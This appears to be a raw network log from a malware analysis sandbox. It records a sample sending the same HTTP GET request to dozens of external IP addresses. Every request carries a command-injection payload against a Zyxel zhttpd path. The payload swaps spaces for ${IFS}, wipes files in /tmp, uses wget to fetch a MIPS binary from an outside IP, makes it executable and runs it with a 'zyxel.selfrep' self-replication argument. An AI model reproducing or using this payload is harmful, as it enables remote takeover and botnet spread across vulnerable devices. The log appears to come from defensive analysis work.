                                      Jan 14, 2024 15:50:34.000586033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1139192.168.2.1442410104.2.220.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000627041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1140192.168.2.1446910110.45.81.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000684023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1141192.168.2.1436036161.190.26.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000696898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1142192.168.2.1441398103.162.203.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000741005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1143192.168.2.1437216103.68.41.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000772953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1144192.168.2.1459300160.92.67.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000799894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1145192.168.2.144726427.19.108.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000844002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1146192.168.2.1438050191.187.87.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000886917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1147192.168.2.1452494114.189.22.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000926018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1148192.168.2.1443304207.60.138.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000961065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1149192.168.2.144298623.183.178.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001007080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1150192.168.2.1454956157.2.53.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001044989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1151192.168.2.1443560101.73.95.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001097918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1152192.168.2.1442620122.50.190.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001118898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1153192.168.2.1446114196.254.139.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001157999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1154192.168.2.1436930139.238.237.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001204967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1155192.168.2.1453438109.51.182.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001251936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1156192.168.2.145427617.70.109.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001275063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1157192.168.2.144737880.40.232.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001300097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1158192.168.2.1452954183.90.98.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001349926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1159192.168.2.1445100164.73.70.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001385927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1160192.168.2.1439618202.91.225.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001420021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1161192.168.2.143924264.107.183.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001476049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1162192.168.2.1446450175.252.204.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001507044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1163192.168.2.1447478198.7.115.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001549959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1164192.168.2.145422481.224.154.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001585960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1165192.168.2.143796619.179.115.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001633883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1166192.168.2.1457202198.65.153.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001730919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1167192.168.2.1444730162.206.191.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001765013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1168192.168.2.144667274.34.186.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001785040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1169192.168.2.1452640123.70.167.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001810074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1170192.168.2.144480497.138.176.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001864910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1171192.168.2.144757824.192.116.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001878977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1172192.168.2.143387635.103.151.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001933098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1173192.168.2.1458440197.18.104.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.001972914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1174192.168.2.1439014107.96.215.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002007961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1175192.168.2.144791261.120.158.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002046108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1176192.168.2.145624096.22.236.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002113104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1177192.168.2.1450728197.110.145.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002136946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1178192.168.2.1450556165.191.18.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002182961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1179192.168.2.144043861.212.34.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002233982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1180192.168.2.143585842.12.168.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002289057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1181192.168.2.1435748101.95.60.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002343893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1182192.168.2.143560878.96.59.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002388000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1183192.168.2.1453742157.230.234.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002410889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1184192.168.2.1458618144.81.84.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002449989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1185192.168.2.144551696.79.48.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002501011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1186192.168.2.1454598210.97.125.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002542019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1187192.168.2.144240087.47.114.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002585888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1188192.168.2.144560895.75.213.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002615929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1189192.168.2.144606849.51.222.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002667904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1190192.168.2.1450140180.204.165.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002713919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1191192.168.2.1434484102.215.197.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002734900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192192.168.2.143710032.251.222.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002774954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1193192.168.2.1445382115.19.53.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002825975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1194192.168.2.1440650118.182.62.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002866030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1195192.168.2.1442566207.251.110.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002895117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1196192.168.2.1451486191.127.160.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002933979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1197192.168.2.1447482152.234.144.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.002971888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1198192.168.2.1454162189.34.9.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003009081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1199192.168.2.1448926178.180.28.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003046989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1200192.168.2.1451214178.116.57.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003083944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1201192.168.2.143868234.231.134.189443
                                      TimestampBytes transferredDirectionData
